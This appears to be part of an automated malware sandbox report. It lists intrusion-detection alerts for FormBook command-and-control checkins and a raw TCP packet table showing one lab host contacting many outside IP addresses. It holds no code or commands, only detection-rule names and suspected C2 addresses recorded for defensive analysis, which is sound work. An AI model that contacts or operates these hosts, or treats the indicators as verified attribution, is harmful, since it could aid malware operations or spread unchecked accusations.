                                                                                  2024-12-04T17:12:33.802453+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049736172.67.180.24680TCP
                                                                                  2024-12-04T17:12:36.501317+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049737172.67.180.24680TCP
                                                                                  2024-12-04T17:12:39.110991+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049738172.67.180.24680TCP
                                                                                  2024-12-04T17:12:39.110991+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049738172.67.180.24680TCP
                                                                                  2024-12-04T17:12:45.190278+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049739118.107.250.10380TCP
                                                                                  2024-12-04T17:12:48.056114+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049740118.107.250.10380TCP
                                                                                  2024-12-04T17:12:50.952898+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049741118.107.250.10380TCP
                                                                                  2024-12-04T17:12:53.821636+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049742118.107.250.10380TCP
                                                                                  2024-12-04T17:12:53.821636+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049742118.107.250.10380TCP
                                                                                  2024-12-04T17:12:59.505900+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049743209.74.77.10980TCP
                                                                                  2024-12-04T17:13:02.220963+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049744209.74.77.10980TCP
                                                                                  2024-12-04T17:13:04.939970+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049745209.74.77.10980TCP
                                                                                  2024-12-04T17:13:07.656658+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049746209.74.77.10980TCP
                                                                                  2024-12-04T17:13:07.656658+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049746209.74.77.10980TCP
                                                                                  2024-12-04T17:13:13.507853+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049747104.21.27.5980TCP
                                                                                  2024-12-04T17:13:16.191238+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049748104.21.27.5980TCP
                                                                                  2024-12-04T17:13:18.797728+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049749104.21.27.5980TCP
                                                                                  2024-12-04T17:13:21.474219+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049750104.21.27.5980TCP
                                                                                  2024-12-04T17:13:21.474219+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049750104.21.27.5980TCP
                                                                                  2024-12-04T17:13:27.166415+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049751194.245.148.18980TCP
                                                                                  2024-12-04T17:13:29.932724+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049752194.245.148.18980TCP
                                                                                  2024-12-04T17:13:32.701537+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049753194.245.148.18980TCP
                                                                                  2024-12-04T17:13:35.465837+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049754194.245.148.18980TCP
                                                                                  2024-12-04T17:13:35.465837+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049754194.245.148.18980TCP
                                                                                  2024-12-04T17:13:40.922282+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049755199.59.243.22780TCP
                                                                                  2024-12-04T17:13:43.567374+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049756199.59.243.22780TCP
                                                                                  2024-12-04T17:13:46.224574+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049757199.59.243.22780TCP
                                                                                  2024-12-04T17:13:48.878875+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049758199.59.243.22780TCP
                                                                                  2024-12-04T17:13:48.878875+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049758199.59.243.22780TCP
                                                                                  2024-12-04T17:13:55.145745+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049759101.35.209.18380TCP
                                                                                  2024-12-04T17:13:58.732692+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049760101.35.209.18380TCP
                                                                                  2024-12-04T17:14:00.882026+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049761101.35.209.18380TCP
                                                                                  2024-12-04T17:14:03.755764+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049762101.35.209.18380TCP
                                                                                  2024-12-04T17:14:03.755764+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049762101.35.209.18380TCP
                                                                                  2024-12-04T17:14:09.273956+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049763162.0.215.3380TCP
                                                                                  2024-12-04T17:14:11.985600+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049764162.0.215.3380TCP
                                                                                  2024-12-04T17:14:14.716610+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049765162.0.215.3380TCP
                                                                                  2024-12-04T17:14:17.430502+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049766162.0.215.3380TCP
                                                                                  2024-12-04T17:14:17.430502+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049766162.0.215.3380TCP
                                                                                  2024-12-04T17:14:23.353295+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049767154.23.184.19480TCP
                                                                                  2024-12-04T17:14:26.228835+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049768154.23.184.19480TCP
                                                                                  2024-12-04T17:14:29.160385+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049769154.23.184.19480TCP
                                                                                  2024-12-04T17:14:32.022684+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049770154.23.184.19480TCP
                                                                                  2024-12-04T17:14:32.022684+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049770154.23.184.19480TCP
                                                                                  2024-12-04T17:14:37.520310+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049771199.59.243.22780TCP
                                                                                  2024-12-04T17:14:40.180661+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049772199.59.243.22780TCP
                                                                                  2024-12-04T17:14:42.836402+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049773199.59.243.22780TCP
                                                                                  2024-12-04T17:14:45.492037+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049774199.59.243.22780TCP
                                                                                  2024-12-04T17:14:45.492037+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049774199.59.243.22780TCP
                                                                                  2024-12-04T17:14:55.640948+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049775172.67.187.11480TCP
                                                                                  2024-12-04T17:14:55.640948+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049775172.67.187.11480TCP
                                                                                  2024-12-04T17:15:09.239496+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977666.29.132.19480TCP
                                                                                  2024-12-04T17:15:12.006003+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977766.29.132.19480TCP
                                                                                  2024-12-04T17:15:14.703048+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977866.29.132.19480TCP
                                                                                  2024-12-04T17:15:17.411748+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204977966.29.132.19480TCP
                                                                                  2024-12-04T17:15:17.411748+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204977966.29.132.19480TCP
                                                                                  2024-12-04T17:15:23.198652+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049780202.92.5.2380TCP
                                                                                  2024-12-04T17:15:26.100914+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049781202.92.5.2380TCP

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 4, 2024 17:11:07.788995981 CET4971080192.168.11.20172.67.187.114
                                                                                  Dec 4, 2024 17:11:07.913011074 CET8049710172.67.187.114192.168.11.20
                                                                                  Dec 4, 2024 17:11:07.913188934 CET4971080192.168.11.20172.67.187.114
                                                                                  Dec 4, 2024 17:11:07.915575027 CET4971080192.168.11.20172.67.187.114
                                                                                  Dec 4, 2024 17:11:08.039475918 CET8049710172.67.187.114192.168.11.20
                                                                                  Dec 4, 2024 17:11:08.870114088 CET8049710172.67.187.114192.168.11.20
                                                                                  Dec 4, 2024 17:11:08.871932030 CET8049710172.67.187.114192.168.11.20
                                                                                  Dec 4, 2024 17:11:08.872127056 CET4971080192.168.11.20172.67.187.114
                                                                                  Dec 4, 2024 17:11:08.872780085 CET4971080192.168.11.20172.67.187.114
                                                                                  Dec 4, 2024 17:11:08.996450901 CET8049710172.67.187.114192.168.11.20
                                                                                  Dec 4, 2024 17:11:33.264105082 CET4971980192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:33.451777935 CET804971966.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:33.451997995 CET4971980192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:33.455607891 CET4971980192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:33.653476954 CET804971966.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:33.653677940 CET804971966.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:33.653690100 CET804971966.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:33.653712034 CET804971966.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:33.653882027 CET4971980192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:33.653912067 CET804971966.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:33.653937101 CET804971966.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:33.654059887 CET4971980192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:34.966666937 CET4971980192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:35.982296944 CET4972080192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:36.168929100 CET804972066.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:36.169099092 CET4972080192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:36.172779083 CET4972080192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:36.368922949 CET804972066.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:36.368933916 CET804972066.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:36.369004965 CET804972066.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:36.369015932 CET804972066.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:36.369021893 CET804972066.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:36.369132996 CET4972080192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:36.369168997 CET4972080192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:37.684669971 CET4972080192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:38.700500965 CET4972180192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:38.887438059 CET804972166.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:38.887609005 CET4972180192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:38.891185999 CET4972180192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:38.891259909 CET4972180192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:39.079797983 CET804972166.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:39.080148935 CET804972166.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:39.080362082 CET804972166.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:39.113266945 CET804972166.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:39.113279104 CET804972166.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:39.113286972 CET804972166.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:39.113308907 CET804972166.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:39.113316059 CET804972166.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:39.113548994 CET4972180192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:40.402323008 CET4972180192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:41.418488026 CET4972280192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:41.604949951 CET804972266.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:41.605164051 CET4972280192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:41.607650042 CET4972280192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:41.810597897 CET804972266.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:41.810607910 CET804972266.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:41.810789108 CET4972280192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:41.810858965 CET804972266.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:41.810869932 CET804972266.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:41.811058044 CET4972280192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:41.817557096 CET804972266.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:41.817598104 CET804972266.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:41.817620993 CET804972266.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:41.817845106 CET4972280192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:41.817914963 CET804972266.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:41.817939997 CET804972266.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:41.818195105 CET4972280192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:41.818939924 CET4972280192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:11:42.004925966 CET804972266.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:11:47.512558937 CET4972380192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:11:47.885473013 CET8049723202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:47.885638952 CET4972380192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:11:47.889233112 CET4972380192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:11:48.258940935 CET8049723202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:48.259759903 CET8049723202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:48.259768009 CET8049723202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:48.259773970 CET8049723202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:48.259979010 CET4972380192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:11:49.401695967 CET4972380192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:11:50.416734934 CET4972480192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:11:50.788527012 CET8049724202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:50.788769007 CET4972480192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:11:50.792583942 CET4972480192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:11:51.163778067 CET8049724202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:51.164731026 CET8049724202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:51.164738894 CET8049724202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:51.164746046 CET8049724202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:51.165066004 CET4972480192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:11:52.306040049 CET4972480192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:11:53.322130919 CET4972580192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:11:53.693193913 CET8049725202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:53.693397045 CET4972580192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:11:53.697046995 CET4972580192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:11:53.697129011 CET4972580192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:11:54.068278074 CET8049725202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:54.068284988 CET8049725202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:54.068290949 CET8049725202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:54.068998098 CET8049725202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:54.069005966 CET8049725202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:54.069217920 CET4972580192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:11:54.069251060 CET8049725202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:54.069257975 CET8049725202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:54.069262981 CET8049725202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:54.069443941 CET4972580192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:11:54.439960003 CET8049725202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:54.440167904 CET8049725202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:56.227924109 CET4972680192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:11:56.598134995 CET8049726202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:56.598368883 CET4972680192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:11:56.600965023 CET4972680192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:11:56.970125914 CET8049726202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:56.970743895 CET8049726202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:56.970796108 CET8049726202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:56.970864058 CET8049726202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:11:56.971215963 CET4972680192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:11:56.971265078 CET4972680192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:11:56.972049952 CET4972680192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:11:57.341335058 CET8049726202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:12:02.196705103 CET4972780192.168.11.20194.195.220.41
                                                                                  Dec 4, 2024 17:12:02.348239899 CET8049727194.195.220.41192.168.11.20
                                                                                  Dec 4, 2024 17:12:02.348412991 CET4972780192.168.11.20194.195.220.41
                                                                                  Dec 4, 2024 17:12:02.352010965 CET4972780192.168.11.20194.195.220.41
                                                                                  Dec 4, 2024 17:12:02.503637075 CET8049727194.195.220.41192.168.11.20
                                                                                  Dec 4, 2024 17:12:02.504995108 CET8049727194.195.220.41192.168.11.20
                                                                                  Dec 4, 2024 17:12:02.505003929 CET8049727194.195.220.41192.168.11.20
                                                                                  Dec 4, 2024 17:12:02.505251884 CET4972780192.168.11.20194.195.220.41
                                                                                  Dec 4, 2024 17:12:03.866430998 CET4972780192.168.11.20194.195.220.41
                                                                                  Dec 4, 2024 17:12:04.882127047 CET4972880192.168.11.20194.195.220.41
                                                                                  Dec 4, 2024 17:12:05.033849955 CET8049728194.195.220.41192.168.11.20
                                                                                  Dec 4, 2024 17:12:05.034063101 CET4972880192.168.11.20194.195.220.41
                                                                                  Dec 4, 2024 17:12:05.037643909 CET4972880192.168.11.20194.195.220.41
                                                                                  Dec 4, 2024 17:12:05.189218044 CET8049728194.195.220.41192.168.11.20
                                                                                  Dec 4, 2024 17:12:05.190957069 CET8049728194.195.220.41192.168.11.20
                                                                                  Dec 4, 2024 17:12:05.190974951 CET8049728194.195.220.41192.168.11.20
                                                                                  Dec 4, 2024 17:12:05.191160917 CET4972880192.168.11.20194.195.220.41
                                                                                  Dec 4, 2024 17:12:06.552875996 CET4972880192.168.11.20194.195.220.41
                                                                                  Dec 4, 2024 17:12:07.569087029 CET4972980192.168.11.20194.195.220.41
                                                                                  Dec 4, 2024 17:12:07.720709085 CET8049729194.195.220.41192.168.11.20
                                                                                  Dec 4, 2024 17:12:07.720879078 CET4972980192.168.11.20194.195.220.41
                                                                                  Dec 4, 2024 17:12:07.724567890 CET4972980192.168.11.20194.195.220.41
                                                                                  Dec 4, 2024 17:12:07.724596024 CET4972980192.168.11.20194.195.220.41
                                                                                  Dec 4, 2024 17:12:07.724669933 CET4972980192.168.11.20194.195.220.41
                                                                                  Dec 4, 2024 17:12:07.876279116 CET8049729194.195.220.41192.168.11.20
                                                                                  Dec 4, 2024 17:12:07.876434088 CET8049729194.195.220.41192.168.11.20
                                                                                  Dec 4, 2024 17:12:07.876446962 CET8049729194.195.220.41192.168.11.20
                                                                                  Dec 4, 2024 17:12:07.876456022 CET8049729194.195.220.41192.168.11.20
                                                                                  Dec 4, 2024 17:12:07.876734972 CET8049729194.195.220.41192.168.11.20
                                                                                  Dec 4, 2024 17:12:07.876864910 CET8049729194.195.220.41192.168.11.20
                                                                                  Dec 4, 2024 17:12:07.878447056 CET8049729194.195.220.41192.168.11.20
                                                                                  Dec 4, 2024 17:12:07.878464937 CET8049729194.195.220.41192.168.11.20
                                                                                  Dec 4, 2024 17:12:07.878638983 CET4972980192.168.11.20194.195.220.41
                                                                                  Dec 4, 2024 17:12:09.239851952 CET4972980192.168.11.20194.195.220.41
                                                                                  Dec 4, 2024 17:12:10.256184101 CET4973080192.168.11.20194.195.220.41
                                                                                  Dec 4, 2024 17:12:10.407785892 CET8049730194.195.220.41192.168.11.20
                                                                                  Dec 4, 2024 17:12:10.407936096 CET4973080192.168.11.20194.195.220.41
                                                                                  Dec 4, 2024 17:12:10.412533998 CET4973080192.168.11.20194.195.220.41
                                                                                  Dec 4, 2024 17:12:10.564245939 CET8049730194.195.220.41192.168.11.20
                                                                                  Dec 4, 2024 17:12:10.565473080 CET8049730194.195.220.41192.168.11.20
                                                                                  Dec 4, 2024 17:12:10.565480947 CET8049730194.195.220.41192.168.11.20
                                                                                  Dec 4, 2024 17:12:10.565489054 CET8049730194.195.220.41192.168.11.20
                                                                                  Dec 4, 2024 17:12:10.565804958 CET4973080192.168.11.20194.195.220.41
                                                                                  Dec 4, 2024 17:12:10.566458941 CET4973080192.168.11.20194.195.220.41
                                                                                  Dec 4, 2024 17:12:10.718020916 CET8049730194.195.220.41192.168.11.20
                                                                                  Dec 4, 2024 17:12:16.166707993 CET4973180192.168.11.20103.230.159.86
                                                                                  Dec 4, 2024 17:12:16.509663105 CET8049731103.230.159.86192.168.11.20
                                                                                  Dec 4, 2024 17:12:16.509840965 CET4973180192.168.11.20103.230.159.86
                                                                                  Dec 4, 2024 17:12:16.513739109 CET4973180192.168.11.20103.230.159.86
                                                                                  Dec 4, 2024 17:12:16.856601954 CET8049731103.230.159.86192.168.11.20
                                                                                  Dec 4, 2024 17:12:16.857515097 CET8049731103.230.159.86192.168.11.20
                                                                                  Dec 4, 2024 17:12:16.857542038 CET8049731103.230.159.86192.168.11.20
                                                                                  Dec 4, 2024 17:12:16.857652903 CET4973180192.168.11.20103.230.159.86
                                                                                  Dec 4, 2024 17:12:18.019141912 CET4973180192.168.11.20103.230.159.86
                                                                                  Dec 4, 2024 17:12:19.035377979 CET4973280192.168.11.20103.230.159.86
                                                                                  Dec 4, 2024 17:12:19.378573895 CET8049732103.230.159.86192.168.11.20
                                                                                  Dec 4, 2024 17:12:19.378703117 CET4973280192.168.11.20103.230.159.86
                                                                                  Dec 4, 2024 17:12:19.382318020 CET4973280192.168.11.20103.230.159.86
                                                                                  Dec 4, 2024 17:12:19.725425959 CET8049732103.230.159.86192.168.11.20
                                                                                  Dec 4, 2024 17:12:19.726087093 CET8049732103.230.159.86192.168.11.20
                                                                                  Dec 4, 2024 17:12:19.726389885 CET8049732103.230.159.86192.168.11.20
                                                                                  Dec 4, 2024 17:12:19.726531982 CET4973280192.168.11.20103.230.159.86
                                                                                  Dec 4, 2024 17:12:20.893513918 CET4973280192.168.11.20103.230.159.86
                                                                                  Dec 4, 2024 17:12:21.911226988 CET4973380192.168.11.20103.230.159.86
                                                                                  Dec 4, 2024 17:12:22.254297972 CET8049733103.230.159.86192.168.11.20
                                                                                  Dec 4, 2024 17:12:22.254523993 CET4973380192.168.11.20103.230.159.86
                                                                                  Dec 4, 2024 17:12:22.258177042 CET4973380192.168.11.20103.230.159.86
                                                                                  Dec 4, 2024 17:12:22.258255959 CET4973380192.168.11.20103.230.159.86
                                                                                  Dec 4, 2024 17:12:22.601233006 CET8049733103.230.159.86192.168.11.20
                                                                                  Dec 4, 2024 17:12:22.601239920 CET8049733103.230.159.86192.168.11.20
                                                                                  Dec 4, 2024 17:12:22.601411104 CET8049733103.230.159.86192.168.11.20
                                                                                  Dec 4, 2024 17:12:22.601418018 CET8049733103.230.159.86192.168.11.20
                                                                                  Dec 4, 2024 17:12:22.602180958 CET8049733103.230.159.86192.168.11.20
                                                                                  Dec 4, 2024 17:12:22.602405071 CET8049733103.230.159.86192.168.11.20
                                                                                  Dec 4, 2024 17:12:22.602658033 CET4973380192.168.11.20103.230.159.86
                                                                                  Dec 4, 2024 17:12:23.767865896 CET4973380192.168.11.20103.230.159.86
                                                                                  Dec 4, 2024 17:12:24.784106016 CET4973480192.168.11.20103.230.159.86
                                                                                  Dec 4, 2024 17:12:25.127336025 CET8049734103.230.159.86192.168.11.20
                                                                                  Dec 4, 2024 17:12:25.127554893 CET4973480192.168.11.20103.230.159.86
                                                                                  Dec 4, 2024 17:12:25.129961967 CET4973480192.168.11.20103.230.159.86
                                                                                  Dec 4, 2024 17:12:25.473043919 CET8049734103.230.159.86192.168.11.20
                                                                                  Dec 4, 2024 17:12:25.474129915 CET8049734103.230.159.86192.168.11.20
                                                                                  Dec 4, 2024 17:12:25.474174976 CET8049734103.230.159.86192.168.11.20
                                                                                  Dec 4, 2024 17:12:25.474500895 CET4973480192.168.11.20103.230.159.86
                                                                                  Dec 4, 2024 17:12:25.475174904 CET4973480192.168.11.20103.230.159.86
                                                                                  Dec 4, 2024 17:12:25.818406105 CET8049734103.230.159.86192.168.11.20
                                                                                  Dec 4, 2024 17:12:30.622313976 CET4973580192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:30.746068001 CET8049735172.67.180.246192.168.11.20
                                                                                  Dec 4, 2024 17:12:30.746289968 CET4973580192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:30.749871969 CET4973580192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:30.873780966 CET8049735172.67.180.246192.168.11.20
                                                                                  Dec 4, 2024 17:12:31.171091080 CET8049735172.67.180.246192.168.11.20
                                                                                  Dec 4, 2024 17:12:31.171140909 CET8049735172.67.180.246192.168.11.20
                                                                                  Dec 4, 2024 17:12:31.171411037 CET4973580192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:31.171588898 CET8049735172.67.180.246192.168.11.20
                                                                                  Dec 4, 2024 17:12:31.171828985 CET4973580192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:32.266639948 CET4973580192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:33.283451080 CET4973680192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:33.407272100 CET8049736172.67.180.246192.168.11.20
                                                                                  Dec 4, 2024 17:12:33.407531023 CET4973680192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:33.411323071 CET4973680192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:33.534977913 CET8049736172.67.180.246192.168.11.20
                                                                                  Dec 4, 2024 17:12:33.802166939 CET8049736172.67.180.246192.168.11.20
                                                                                  Dec 4, 2024 17:12:33.802191973 CET8049736172.67.180.246192.168.11.20
                                                                                  Dec 4, 2024 17:12:33.802419901 CET8049736172.67.180.246192.168.11.20
                                                                                  Dec 4, 2024 17:12:33.802453041 CET4973680192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:33.802650928 CET4973680192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:34.921727896 CET4973680192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:35.937906027 CET4973780192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:36.061343908 CET8049737172.67.180.246192.168.11.20
                                                                                  Dec 4, 2024 17:12:36.061644077 CET4973780192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:36.065715075 CET4973780192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:36.065758944 CET4973780192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:36.065809011 CET4973780192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:36.189310074 CET8049737172.67.180.246192.168.11.20
